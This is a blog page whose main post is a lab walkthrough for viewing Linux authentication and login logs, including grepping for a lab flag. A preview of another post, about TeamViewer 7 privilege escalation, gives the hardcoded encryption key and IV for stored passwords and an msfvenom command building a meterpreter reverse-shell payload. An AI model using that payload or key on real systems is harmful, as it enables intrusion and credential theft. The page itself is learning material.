Skip to main content

Analyzing Different Log Files And Knowing Their Importance - Linux

 

Viewing Logs

Analyzing Different Log Files And Knowing Their Importance

  1. While on the terminal shell within the Ubuntu systemtype the command below to view the content of the auth.log file and press Enter. This file logs system authorization information.

root@Ubuntu:/home/student# cat /var/log/auth.log | less

image121.jpg

  1. Press q to exit.

image123.jpg

  1. While on the terminal shell within the Ubuntu systemtype the command below to view the content of the auth.log file and press Enter to find flag6.

root@Ubuntu:/home/student# grep -i "flag6" /var/log/auth*

NOTE: The output of this command may vary slightly depending on which log the answer is in.

  1. Type the command below to view the content of the last.log file and press Enter. This file logs recent login information.

root@Ubuntu:/home/student# lastlog

image125.jpg

  1. Type the command below to view the content of the btmp log file and press Enter. This file logs failed login attempts.

root@Ubuntu:/home/student#last –f /var/log/btmp | more

image127.jpg

  1. Type the command below to view the content of the wtmp log file and press Enter. This file logs login records to view who is currently connected to the system.

root@Ubuntu:/home/student#last –f /var/log/wtmp | more

image129.jpg

Comments

Post a Comment

Popular posts from this blog

How To Run TOR as a Non-Root User

Hello Friends, Today I finally figured out something that had eluded for quite a while, and that is... the mysterious process of running TOR as a non-root user! Like many other novice hackers, I had tried to run TOR by adding a user in Kali Linux through the following CLI commands: $ useradd guest $ passwd guest $ runuser -l guest -c ./start-tor-browser.desktop Which gave me the lovely error message below: $ Tor Browser must be run within the X Window System This last output one gives us a clue: the X Window System is graphical interface, which means that we need to run this software outside the CLI (you can try downloading the xorg, but that proved to be much of a headache). To do this, go here: Log out as root and login as the user you created. The computer will load the GUI and you will now be able to run TOR as a non-root user! Please let me know if this tutorial helped you out! xoxo
Post a Comment
Read more

TeamViewer 7 Privilege Escalation

Hello! Today was a good day. I learned how to exploit a privesc vulnerability in TeamViewer (version 7) which had eluded me for quite some time due to a lack of user-friendly resources available online. But today I am changing all that ;) So basically, TeamViewer 7 stores user passwords encrypted with AES-128-CBC with a key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. This means that someone can decrypt that password using that key and iv and use it elsewhere if the user in question made repeated use of their password (as users often do!) Now, the process is doing this manually is complicated but luckily for us, a Metasploit module exists to automate this for us! First. generate a payload with msfvenom like so: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip attacker> LPORT=4444 -f exe > revshell.exe Then move the payload to the machine with PowerShell (remember to move to the file to the ...
2 comments
Read more

The Commits in the Sandbox

One night I dreamed a dream. I had started early on the networking assignment with my partner. Across the dark VM terminal flashed commits from my fork. For each fork, I noticed two sets of commits in the repo, One belonging to me and one to my partner. After the last commit of my life flashed before me, I feel into a very deep chemically induced sleep. After being released from the hospital two weeks later, I looked back at the commits in the repo. I noticed that there was only one set of commits. I walked in a daze to the computer lab to find my partner finishing up his machine learning assignment. Suddenly, he looked up at me and blinked. A tear came to my eye. “My precious partner,” he said as he put his pencil down. "You are my group member and I would never leave you, even during our most difficult ARP tests.” My jaw dropped. “…Did you really code an entire router by yourself!?” I exclaimed. He smiled. “No, you were with me. F...
Post a Comment
Read more